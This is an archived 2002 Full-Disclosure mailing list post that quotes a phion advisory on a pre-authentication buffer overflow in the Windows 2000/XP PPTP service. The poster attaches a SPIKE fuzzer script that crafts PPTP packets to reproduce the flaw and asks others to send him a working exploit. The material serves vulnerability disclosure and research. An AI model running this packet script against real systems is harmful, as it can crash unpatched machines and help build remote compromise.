lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: dave at immunitysec.com (Dave Aitel) Subject: Re: Microsoft PPTP Server and Client remote vulnerability SPIKE 2.6.2 or above should be able to handle this .spk file which will replicate the vulnerability. Someone send me a working sploit in exchange, please. I'm too lazy to muck with it. (Or I have other exploits to muck with, one or the other :>) -dave P.S. Grab new SPIKE releases (2.6.2 for SPIKE and 1.3 for SPIKE Proxy) at http://www.immunitysec.com/spike.html, if you haven't already. P.P.S. This script is released under the terms of the GNU GPL v 2.0. On Thu, 2002-09-26 at 05:43, sh@...on.com wrote: > phion Security Advisory 26/09/2002 > > Microsoft PPTP Server and Client remote vulnerability > > > Summary > ----------------------------- > > The Microsoft PPTP Service shipping with Windows 2000 and XP contains a > remotely exploitable pre-authentication bufferoverflow. > > > Affected Systems > ----------------------------- > > Microsoft Windows 2000 and XP running either a PPTP Server or Client. > > > Impact > ----------------------------- > > With a specially crafted PPTP packet it is possible to overwrite kernel > memory. > > A DoS resulting in a lockup of the machine has been verified on > Windows 2000 SP3 and Windows XP. > > A remote compromise should be possible deploying proper shellcode, > as we were able to fill EDI and EDX with our data. > > Clients are vulnerable too, because the Service always listens on port > 1723 on any interface of the machine, this might be of special concern > to DSL users which use PPTP to connect to their modem. > > > Solution > ----------------------------- > > As a temporary solution for the Client issue, one might firewall the PPTP > port in the Internet Connection Firewall for Windows XP. > > We dont know of any solution for Windows 2000 and Windows XP PPTP servers. > > The vendor has been informed. > > > Acknowledgements > ----------------------------- > > The bug has been discovered by Stephan Hoffmann and Thomas Unterleitner > on behalf of phion Information Technologies. > > > Contact Information > ----------------------------- > > phion Information Technologies can be reached via: > office@...on.com / http://www.phion.com > > Stephan Hoffmann can be reached via: > sh@...on.com > > Thomas Unterleitner can be reached via: > t.unterleitner@...on.com > > References > ----------------------------- > > [1] phion Information Technologies > http://www.phion.com/ > > Exploit > ----------------------------- > > phion Information Technologies will not provide an exploit for this issue. > > > Disclaimer > ----------------------------- > > This advisory does not claim to be complete or to be usable for any > purpose. > > This advisory is free for open distribution in unmodified form. > > Articles or Publications that are based on information from this advisory > have to include link [1]. > > -------------- next part -------------- //start control request s_block_start("PPTP"); s_binary_block_size_halfword_bigendian("PPTP"); //message type 1 - control request s_int_variable(0x0001,5); //cookie s_binary("1a 2b 3c 4d"); //type 1 - start control request //5 is big endian halfword s_int_variable(0x0001,5); //reserved s_binary("0000"); //version 1.0 s_int_variable(0x0100,5); //reserved s_binary("0000"); //Framing: Ethernet s_binary("00000003"); //Bearer: Digital s_binary("00000002"); //maximum channels s_binary("ffff"); //firmware revision s_int_variable(0x0001,5); //hostname s_string_variable("A"); s_binary_repeat("00",63); //vendor s_string_variable("A"); s_binary_repeat("00",63); s_block_end("PPTP"); /// /// NEXT PACKET /// /// //start outgoing call request s_block_start("PPTP2"); s_binary_block_size_halfword_bigendian("PPTP2"); //message type 1 - control request s_int_variable(0x0001,5); //cookie s_binary("1a 2b 3c 4d"); //type 1 - outgoing call request //5 is big endian halfword s_int_variable(0x0007,5); //reserved s_binary("0000"); //call id s_binary("0000"); //serial number s_binary("0000"); //min bps s_binary("00000960"); //max bps s_binary("00989680"); //bearer capabilities s_binary("00000002"); //framing s_binary("00000003"); //recieve window size s_binary("0003"); //processing delay s_binary("0000"); s_binary_block_size_halfword_bigendian("PHONENUMBER"); //reserved s_binary("0000"); s_block_start("PHONENUMBER"); s_string_variable(""); s_block_end("PHONENUMBER"); //subaddress s_string_variable(""); s_block_end("PPTP2"); -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 232 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020926/41a8850f/attachment.bin
Powered by blists - more mailing lists